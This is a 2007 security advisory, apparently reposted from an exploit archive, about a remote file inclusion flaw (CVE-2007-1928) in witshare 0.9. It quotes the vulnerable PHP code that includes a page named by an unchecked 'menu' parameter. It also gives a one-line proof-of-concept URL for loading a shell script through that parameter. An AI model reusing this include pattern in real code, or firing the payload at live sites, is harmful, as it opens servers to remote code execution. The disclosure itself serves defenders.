Bug: witshare 0.9 Remote File Include Vulnerabilitiy (WLB-2007040047 Ascii Version)

English Version
WLB2

CVE WLB2

 Topic: witshare 0.9 Remote File Include Vulnerabilitiy
 Credit: the_Edit0r
 Date: 2007.04.11
 CWE: N/A
 CVE: CVE-2007-1928 (Show details)

Use CVE to see details like:
- CVSS2,
- Affected Software,
- References

Risk
Local
Remote
High
No
Yes

""""""""""""""""""""
""""""""""""""""""""
"""""""
""" :: :: ::::: :::: """
""" :: :: :: : :: """
""" :::: :: :: ::::: ::::: :::: """
""" :: :: ::: ::: :: :: :: :: :: """
""" :: :: :: : : ::::: :: :: :::: """
""" """
""""""""""""""""""""
""""""""""""""""""""
"""""""
Xmor$ Security Vulnerability Research TM

# Tilte: witshare 0.9 Remote File Include Vulnerabilitiy

# Author..................: [the_Edit0r]
# HomePage ...............: [Www.XmorS-sEcurity.coM]
# Location ...............: [Iran]
# Software ...............: [witshare]
# Impact..................: [ Remote ]
# We ArE .................: [ Scorpiunix,KAMY4r,Zer0.Cod3r,SilliCONIC,D3vil_B0y_ir,S.W.A.T,DarkAngel ]

------------------------------------- Codes --------------------------------

<?php

if (isset($_GET['menu'])) {
include('pagelets/'.$_GET['menu'].'.inc');}
else {
include('pagelets/about.inc');}
?>

------------------------------- proof Of Concept ---------------------------

www.example.com/[path]/index.php?menu=[Sh3ll-Script]

------------------------------------------------------------------------
----

# Contact me : the_3dit0r[at]Yahoo[dot]coM

# [XmorS-SEcurity.coM]

[ ASCII VERSION ]

Copyright 2012, cxsecurity.com